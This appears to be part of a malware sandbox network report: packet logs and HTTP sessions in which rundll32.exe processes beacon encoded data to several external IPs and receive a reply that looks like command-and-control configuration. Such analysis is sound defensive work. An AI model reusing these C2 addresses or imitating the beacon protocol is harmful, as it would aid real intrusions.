Jul 16, 2024 09:56:41.094604969 CEST	49766	80	192.168.2.7	77.238.229.63
Jul 16, 2024 09:56:41.094708920 CEST	49766	80	192.168.2.7	77.238.229.63
Jul 16, 2024 09:56:41.095791101 CEST	49767	80	192.168.2.7	77.238.250.123
Jul 16, 2024 09:56:41.099500895 CEST	80	49766	77.238.229.63	192.168.2.7
Jul 16, 2024 09:56:41.100687027 CEST	80	49767	77.238.250.123	192.168.2.7
Jul 16, 2024 09:56:41.100791931 CEST	49767	80	192.168.2.7	77.238.250.123
Jul 16, 2024 09:56:41.101109028 CEST	49767	80	192.168.2.7	77.238.250.123
Jul 16, 2024 09:56:41.105890036 CEST	80	49767	77.238.250.123	192.168.2.7
Jul 16, 2024 09:56:41.699449062 CEST	80	49767	77.238.250.123	192.168.2.7
Jul 16, 2024 09:56:41.699915886 CEST	49767	80	192.168.2.7	77.238.250.123
Jul 16, 2024 09:56:41.705409050 CEST	80	49767	77.238.250.123	192.168.2.7
Jul 16, 2024 09:56:41.705490112 CEST	49767	80	192.168.2.7	77.238.250.123
Jul 16, 2024 09:56:46.578088045 CEST	49768	80	192.168.2.7	195.2.70.38
Jul 16, 2024 09:56:46.583152056 CEST	80	49768	195.2.70.38	192.168.2.7
Jul 16, 2024 09:56:46.583290100 CEST	49768	80	192.168.2.7	195.2.70.38
Jul 16, 2024 09:56:46.583673000 CEST	49768	80	192.168.2.7	195.2.70.38
Jul 16, 2024 09:56:46.589951038 CEST	80	49768	195.2.70.38	192.168.2.7
Jul 16, 2024 09:56:48.319001913 CEST	80	49768	195.2.70.38	192.168.2.7
Jul 16, 2024 09:56:48.319123030 CEST	49768	80	192.168.2.7	195.2.70.38
Jul 16, 2024 09:56:48.319259882 CEST	49768	80	192.168.2.7	195.2.70.38
Jul 16, 2024 09:56:48.320163012 CEST	49769	80	192.168.2.7	91.142.74.28
Jul 16, 2024 09:56:48.324193001 CEST	80	49768	195.2.70.38	192.168.2.7
Jul 16, 2024 09:56:48.325771093 CEST	80	49769	91.142.74.28	192.168.2.7
Jul 16, 2024 09:56:48.325853109 CEST	49769	80	192.168.2.7	91.142.74.28
Jul 16, 2024 09:56:48.326128006 CEST	49769	80	192.168.2.7	91.142.74.28
Jul 16, 2024 09:56:48.332341909 CEST	80	49769	91.142.74.28	192.168.2.7
Jul 16, 2024 09:56:50.053456068 CEST	80	49769	91.142.74.28	192.168.2.7
Jul 16, 2024 09:56:50.053525925 CEST	49769	80	192.168.2.7	91.142.74.28
Jul 16, 2024 09:56:50.053631067 CEST	49769	80	192.168.2.7	91.142.74.28
Jul 16, 2024 09:56:50.055578947 CEST	49770	80	192.168.2.7	77.238.224.56
Jul 16, 2024 09:56:50.059163094 CEST	80	49769	91.142.74.28	192.168.2.7
Jul 16, 2024 09:56:50.061156034 CEST	80	49770	77.238.224.56	192.168.2.7
Jul 16, 2024 09:56:50.061239004 CEST	49770	80	192.168.2.7	77.238.224.56
Jul 16, 2024 09:56:50.066318989 CEST	49770	80	192.168.2.7	77.238.224.56
Jul 16, 2024 09:56:50.071947098 CEST	80	49770	77.238.224.56	192.168.2.7
Jul 16, 2024 09:56:51.683062077 CEST	80	49770	77.238.224.56	192.168.2.7
Jul 16, 2024 09:56:51.683199883 CEST	49770	80	192.168.2.7	77.238.224.56
Jul 16, 2024 09:56:51.683279037 CEST	49770	80	192.168.2.7	77.238.224.56
Jul 16, 2024 09:56:51.684215069 CEST	49771	80	192.168.2.7	77.238.229.63
Jul 16, 2024 09:56:51.688179016 CEST	80	49770	77.238.224.56	192.168.2.7
Jul 16, 2024 09:56:51.689161062 CEST	80	49771	77.238.229.63	192.168.2.7
Jul 16, 2024 09:56:51.689300060 CEST	49771	80	192.168.2.7	77.238.229.63
Jul 16, 2024 09:56:51.689548016 CEST	49771	80	192.168.2.7	77.238.229.63
Jul 16, 2024 09:56:51.694405079 CEST	80	49771	77.238.229.63	192.168.2.7
Jul 16, 2024 09:56:52.174263000 CEST	49711	30865	192.168.2.7	91.142.73.198
Jul 16, 2024 09:56:52.179620028 CEST	30865	49711	91.142.73.198	192.168.2.7
Jul 16, 2024 09:56:53.310436010 CEST	80	49771	77.238.229.63	192.168.2.7
Jul 16, 2024 09:56:53.310560942 CEST	49771	80	192.168.2.7	77.238.229.63
Jul 16, 2024 09:56:53.310662985 CEST	49771	80	192.168.2.7	77.238.229.63
Jul 16, 2024 09:56:53.311696053 CEST	49772	80	192.168.2.7	77.238.250.123
Jul 16, 2024 09:56:53.315520048 CEST	80	49771	77.238.229.63	192.168.2.7
Jul 16, 2024 09:56:53.316807985 CEST	80	49772	77.238.250.123	192.168.2.7
Jul 16, 2024 09:56:53.316881895 CEST	49772	80	192.168.2.7	77.238.250.123
Jul 16, 2024 09:56:53.317260981 CEST	49772	80	192.168.2.7	77.238.250.123
Jul 16, 2024 09:56:53.322407007 CEST	80	49772	77.238.250.123	192.168.2.7
Jul 16, 2024 09:56:53.923177004 CEST	80	49772	77.238.250.123	192.168.2.7
Jul 16, 2024 09:56:53.923710108 CEST	49772	80	192.168.2.7	77.238.250.123
Jul 16, 2024 09:56:53.929106951 CEST	80	49772	77.238.250.123	192.168.2.7
Jul 16, 2024 09:56:53.929231882 CEST	49772	80	192.168.2.7	77.238.250.123
Jul 16, 2024 09:56:57.370515108 CEST	30865	49711	91.142.73.198	192.168.2.7
Jul 16, 2024 09:56:57.370960951 CEST	49711	30865	192.168.2.7	91.142.73.198
Jul 16, 2024 09:56:57.376240015 CEST	30865	49711	91.142.73.198	192.168.2.7
Jul 16, 2024 09:57:06.239140987 CEST	49711	30865	192.168.2.7	91.142.73.198
Jul 16, 2024 09:57:06.244081020 CEST	30865	49711	91.142.73.198	192.168.2.7
Jul 16, 2024 09:57:06.453090906 CEST	30865	49711	91.142.73.198	192.168.2.7
Jul 16, 2024 09:57:06.500787020 CEST	49711	30865	192.168.2.7	91.142.73.198
Jul 16, 2024 09:57:11.710036993 CEST	49773	80	192.168.2.7	195.2.70.38
Jul 16, 2024 09:57:11.847932100 CEST	80	49773	195.2.70.38	192.168.2.7
Jul 16, 2024 09:57:11.848339081 CEST	49773	80	192.168.2.7	195.2.70.38
Jul 16, 2024 09:57:11.849152088 CEST	49773	80	192.168.2.7	195.2.70.38
Jul 16, 2024 09:57:11.854099035 CEST	80	49773	195.2.70.38	192.168.2.7
Jul 16, 2024 09:57:13.770133018 CEST	80	49773	195.2.70.38	192.168.2.7
Jul 16, 2024 09:57:13.770447969 CEST	49773	80	192.168.2.7	195.2.70.38
Jul 16, 2024 09:57:13.771236897 CEST	49774	80	192.168.2.7	91.142.74.28
Jul 16, 2024 09:57:13.771236897 CEST	49773	80	192.168.2.7	195.2.70.38
Jul 16, 2024 09:57:14.047805071 CEST	80	49773	195.2.70.38	192.168.2.7
Jul 16, 2024 09:57:14.047930956 CEST	49773	80	192.168.2.7	195.2.70.38
Jul 16, 2024 09:57:14.047940969 CEST	80	49773	195.2.70.38	192.168.2.7
Jul 16, 2024 09:57:14.048011065 CEST	49773	80	192.168.2.7	195.2.70.38
Jul 16, 2024 09:57:14.048913002 CEST	80	49774	91.142.74.28	192.168.2.7
Jul 16, 2024 09:57:14.048940897 CEST	80	49773	195.2.70.38	192.168.2.7
Jul 16, 2024 09:57:14.049010992 CEST	49774	80	192.168.2.7	91.142.74.28
Jul 16, 2024 09:57:14.049349070 CEST	49774	80	192.168.2.7	91.142.74.28
Jul 16, 2024 09:57:14.054194927 CEST	80	49774	91.142.74.28	192.168.2.7
Jul 16, 2024 09:57:15.790159941 CEST	80	49774	91.142.74.28	192.168.2.7
Jul 16, 2024 09:57:15.790260077 CEST	49774	80	192.168.2.7	91.142.74.28
Jul 16, 2024 09:57:15.790359974 CEST	49774	80	192.168.2.7	91.142.74.28
Jul 16, 2024 09:57:15.791157007 CEST	49775	80	192.168.2.7	77.238.224.56
Jul 16, 2024 09:57:15.795396090 CEST	80	49774	91.142.74.28	192.168.2.7
Jul 16, 2024 09:57:15.796089888 CEST	80	49775	77.238.224.56	192.168.2.7
Jul 16, 2024 09:57:15.796173096 CEST	49775	80	192.168.2.7	77.238.224.56
Jul 16, 2024 09:57:15.796458960 CEST	49775	80	192.168.2.7	77.238.224.56
Jul 16, 2024 09:57:15.801318884 CEST	80	49775	77.238.224.56	192.168.2.7
Jul 16, 2024 09:57:17.418351889 CEST	80	49775	77.238.224.56	192.168.2.7
Jul 16, 2024 09:57:17.418503046 CEST	49775	80	192.168.2.7	77.238.224.56
Jul 16, 2024 09:57:17.418567896 CEST	49775	80	192.168.2.7	77.238.224.56
Jul 16, 2024 09:57:17.423472881 CEST	80	49775	77.238.224.56	192.168.2.7
Jul 16, 2024 09:57:17.428041935 CEST	49776	80	192.168.2.7	77.238.229.63
Jul 16, 2024 09:57:17.433053970 CEST	80	49776	77.238.229.63	192.168.2.7
Jul 16, 2024 09:57:17.433192015 CEST	49776	80	192.168.2.7	77.238.229.63
Jul 16, 2024 09:57:17.433605909 CEST	49776	80	192.168.2.7	77.238.229.63
Jul 16, 2024 09:57:17.438492060 CEST	80	49776	77.238.229.63	192.168.2.7
Jul 16, 2024 09:57:17.585561991 CEST	30865	49711	91.142.73.198	192.168.2.7
Jul 16, 2024 09:57:17.585854053 CEST	49711	30865	192.168.2.7	91.142.73.198
Jul 16, 2024 09:57:17.590677977 CEST	30865	49711	91.142.73.198	192.168.2.7
Jul 16, 2024 09:57:19.059791088 CEST	80	49776	77.238.229.63	192.168.2.7
Jul 16, 2024 09:57:19.060017109 CEST	49776	80	192.168.2.7	77.238.229.63
Jul 16, 2024 09:57:19.060095072 CEST	49776	80	192.168.2.7	77.238.229.63
Jul 16, 2024 09:57:19.061923027 CEST	49777	80	192.168.2.7	77.238.250.123
Jul 16, 2024 09:57:19.064990044 CEST	80	49776	77.238.229.63	192.168.2.7
Jul 16, 2024 09:57:19.066767931 CEST	80	49777	77.238.250.123	192.168.2.7
Jul 16, 2024 09:57:19.066869974 CEST	49777	80	192.168.2.7	77.238.250.123
Jul 16, 2024 09:57:19.067260027 CEST	49777	80	192.168.2.7	77.238.250.123
Jul 16, 2024 09:57:19.072056055 CEST	80	49777	77.238.250.123	192.168.2.7
Jul 16, 2024 09:57:19.661217928 CEST	80	49777	77.238.250.123	192.168.2.7
Jul 16, 2024 09:57:19.661761999 CEST	49777	80	192.168.2.7	77.238.250.123
Jul 16, 2024 09:57:19.667160988 CEST	80	49777	77.238.250.123	192.168.2.7
Jul 16, 2024 09:57:19.667287111 CEST	49777	80	192.168.2.7	77.238.250.123
Jul 16, 2024 09:57:23.915220976 CEST	49778	80	192.168.2.7	195.2.70.38
Jul 16, 2024 09:57:23.920259953 CEST	80	49778	195.2.70.38	192.168.2.7
Jul 16, 2024 09:57:23.920376062 CEST	49778	80	192.168.2.7	195.2.70.38
Jul 16, 2024 09:57:23.920691013 CEST	49778	80	192.168.2.7	195.2.70.38
Jul 16, 2024 09:57:23.925524950 CEST	80	49778	195.2.70.38	192.168.2.7
Jul 16, 2024 09:57:25.666830063 CEST	80	49778	195.2.70.38	192.168.2.7
Jul 16, 2024 09:57:25.666980982 CEST	49778	80	192.168.2.7	195.2.70.38
Jul 16, 2024 09:57:25.667047977 CEST	49778	80	192.168.2.7	195.2.70.38
Jul 16, 2024 09:57:25.668109894 CEST	49779	80	192.168.2.7	91.142.74.28
Jul 16, 2024 09:57:25.671869993 CEST	80	49778	195.2.70.38	192.168.2.7
Jul 16, 2024 09:57:25.672997952 CEST	80	49779	91.142.74.28	192.168.2.7
Jul 16, 2024 09:57:25.673086882 CEST	49779	80	192.168.2.7	91.142.74.28
Jul 16, 2024 09:57:25.673943043 CEST	49779	80	192.168.2.7	91.142.74.28
Jul 16, 2024 09:57:25.678814888 CEST	80	49779	91.142.74.28	192.168.2.7
Jul 16, 2024 09:57:27.417673111 CEST	80	49779	91.142.74.28	192.168.2.7
Jul 16, 2024 09:57:27.421549082 CEST	49779	80	192.168.2.7	91.142.74.28
Jul 16, 2024 09:57:27.421823978 CEST	49779	80	192.168.2.7	91.142.74.28
Jul 16, 2024 09:57:27.424171925 CEST	49780	80	192.168.2.7	77.238.224.56
Jul 16, 2024 09:57:27.426656961 CEST	80	49779	91.142.74.28	192.168.2.7
Jul 16, 2024 09:57:27.429075003 CEST	80	49780	77.238.224.56	192.168.2.7
Jul 16, 2024 09:57:27.433514118 CEST	49780	80	192.168.2.7	77.238.224.56
Jul 16, 2024 09:57:27.434370041 CEST	49780	80	192.168.2.7	77.238.224.56
Jul 16, 2024 09:57:27.439325094 CEST	80	49780	77.238.224.56	192.168.2.7
Jul 16, 2024 09:57:29.062201977 CEST	80	49780	77.238.224.56	192.168.2.7
Jul 16, 2024 09:57:29.062429905 CEST	49780	80	192.168.2.7	77.238.224.56
Jul 16, 2024 09:57:29.062525988 CEST	49780	80	192.168.2.7	77.238.224.56
Jul 16, 2024 09:57:29.063549995 CEST	49781	80	192.168.2.7	77.238.229.63
Jul 16, 2024 09:57:29.067441940 CEST	80	49780	77.238.224.56	192.168.2.7
Jul 16, 2024 09:57:29.068835974 CEST	80	49781	77.238.229.63	192.168.2.7
Jul 16, 2024 09:57:29.069051027 CEST	49781	80	192.168.2.7	77.238.229.63
Jul 16, 2024 09:57:29.069286108 CEST	49781	80	192.168.2.7	77.238.229.63
Jul 16, 2024 09:57:29.074093103 CEST	80	49781	77.238.229.63	192.168.2.7
Jul 16, 2024 09:57:30.699856043 CEST	80	49781	77.238.229.63	192.168.2.7
Jul 16, 2024 09:57:30.699949026 CEST	49781	80	192.168.2.7	77.238.229.63
Jul 16, 2024 09:57:31.669902086 CEST	49781	80	192.168.2.7	77.238.229.63
Jul 16, 2024 09:57:31.672759056 CEST	49782	80	192.168.2.7	77.238.250.123
Jul 16, 2024 09:57:31.674803972 CEST	80	49781	77.238.229.63	192.168.2.7
Jul 16, 2024 09:57:31.677562952 CEST	80	49782	77.238.250.123	192.168.2.7
Jul 16, 2024 09:57:31.678011894 CEST	49782	80	192.168.2.7	77.238.250.123
Jul 16, 2024 09:57:31.678011894 CEST	49782	80	192.168.2.7	77.238.250.123
Jul 16, 2024 09:57:31.682856083 CEST	80	49782	77.238.250.123	192.168.2.7
Jul 16, 2024 09:57:32.308358908 CEST	80	49782	77.238.250.123	192.168.2.7
Jul 16, 2024 09:57:32.308614016 CEST	49782	80	192.168.2.7	77.238.250.123
Jul 16, 2024 09:57:32.313858032 CEST	80	49782	77.238.250.123	192.168.2.7
Jul 16, 2024 09:57:32.317194939 CEST	49782	80	192.168.2.7	77.238.250.123
Jul 16, 2024 09:57:32.606326103 CEST	49711	30865	192.168.2.7	91.142.73.198
Jul 16, 2024 09:57:32.611143112 CEST	30865	49711	91.142.73.198	192.168.2.7

HTTP Request Dependency Graph

195.2.70.38

91.142.74.28

77.238.224.56

77.238.229.63

77.238.250.123

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49701	195.2.70.38	80	5448	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 16, 2024 09:53:26.090117931 CEST	293	OUT	POST / HTTP/1.1 Host: 195.2.70.38 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: i1pdGRAY Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49702	195.2.70.38	80	3576	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 16, 2024 09:53:26.119076014 CEST	293	OUT	POST / HTTP/1.1 Host: 195.2.70.38 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: h8Jtm2iP Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49703	91.142.74.28	80	5448	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 16, 2024 09:53:27.841810942 CEST	294	OUT	POST / HTTP/1.1 Host: 91.142.74.28 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: iCSB6EdI Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49704	91.142.74.28	80	3576	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 16, 2024 09:53:27.852272034 CEST	294	OUT	POST / HTTP/1.1 Host: 91.142.74.28 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: miLxDS5v Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	49705	77.238.224.56	80	3576	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 16, 2024 09:53:29.704624891 CEST	295	OUT	POST / HTTP/1.1 Host: 77.238.224.56 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: C8u4qbZM Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.7	49706	77.238.224.56	80	5448	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 16, 2024 09:53:29.704830885 CEST	295	OUT	POST / HTTP/1.1 Host: 77.238.224.56 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: ejGLGxRV Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.7	49707	77.238.229.63	80	5448	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 16, 2024 09:53:31.362036943 CEST	295	OUT	POST / HTTP/1.1 Host: 77.238.229.63 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: ifU4kOM2 Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.7	49708	77.238.229.63	80	3576	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 16, 2024 09:53:31.362492085 CEST	295	OUT	POST / HTTP/1.1 Host: 77.238.229.63 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: 493WrbBq Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.7	49709	77.238.250.123	80	5448	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 16, 2024 09:53:32.983453035 CEST	296	OUT	POST / HTTP/1.1 Host: 77.238.250.123 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: J6ZiRKCc Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
Jul 16, 2024 09:53:34.357839108 CEST	546	IN	HTTP/1.1 200 OK Date: Tue, 16 Jul 2024 07:53:34 GMT Content-Length: 428 Content-Type: text/plain; charset=utf-8 Data Raw: 39 31 2e 31 34 32 2e 37 33 2e 31 39 38 3b 33 30 38 36 35 3b 68 59 7a 39 74 52 57 52 74 41 58 34 70 70 45 51 3a 37 55 4c 2f 41 31 50 2f 66 65 36 31 54 4a 62 39 65 5a 5a 35 38 48 68 2e 71 78 75 32 6e 6b 64 2e 35 70 63 37 43 74 5a 30 65 57 30 2e 31 6a 4b 33 6c 32 45 38 6a 43 50 2c 54 32 4d 68 79 54 69 74 66 34 65 74 67 78 32 70 38 70 68 3a 76 39 37 2f 4e 33 4d 2f 70 41 49 39 78 52 43 31 67 49 36 2e 34 37 4e 31 59 39 38 34 35 68 42 32 4c 65 4d 2e 4f 46 4c 37 33 39 51 34 36 70 37 2e 46 6a 4a 32 4a 47 6c 38 46 7a 33 2c 72 6e 62 68 47 44 79 74 67 39 59 74 48 75 67 70 65 46 39 3a 79 57 77 2f 65 44 4b 2f 59 57 30 37 78 42 7a 37 56 72 4e 2e 50 31 4d 32 53 54 73 33 31 44 35 38 49 70 43 2e 4a 69 45 32 4f 65 64 32 38 67 34 34 59 4e 43 2e 38 42 71 35 76 5a 6b 36 45 55 39 2c 49 6b 62 68 62 4a 42 74 4a 47 6d 74 67 6b 69 70 57 33 54 3a 32 6d 30 2f 4d 76 31 2f 6c 74 72 37 36 33 53 37 6e 61 48 2e 52 48 76 32 44 33 59 33 30 54 50 38 48 73 6c 2e 72 45 74 32 44 42 70 32 49 34 66 39 79 33 65 2e 49 4b 4e 36 49 49 34 33 58 [TRUNCATED] Data Ascii: 91.142.73.198;30865;hYz9tRWRtAX4ppEQ:7UL/A1P/fe61TJb9eZZ58Hh.qxu2nkd.5pc7CtZ0eW0.1jK3l2E8jCP,T2MhyTitf4etgx2p8ph:v97/N3M/pAI9xRC1gI6.47N1Y9845hB2LeM.OFL739Q46p7.FjJ2JGl8Fz3,rnbhGDytg9YtHugpeF9:yWw/eDK/YW07xBz7VrN.P1M2STs31D58IpC.JiE2Oed28g44YNC.8Bq5vZk6EU9,IkbhbJBtJGmtgkipW3T:2m0/Mv1/ltr763S7naH.RHv2D3Y30TP8Hsl.rEt2DBp2I4f9y3e.IKN6II43XKq,TMkhafOtun8tGWepRQW:Sue/79s/CZU7Xb77cDZ.KLh2KcX3Pg68308.1rh2bqo5TUv0RO4.3kc1dG12QyX3LhN
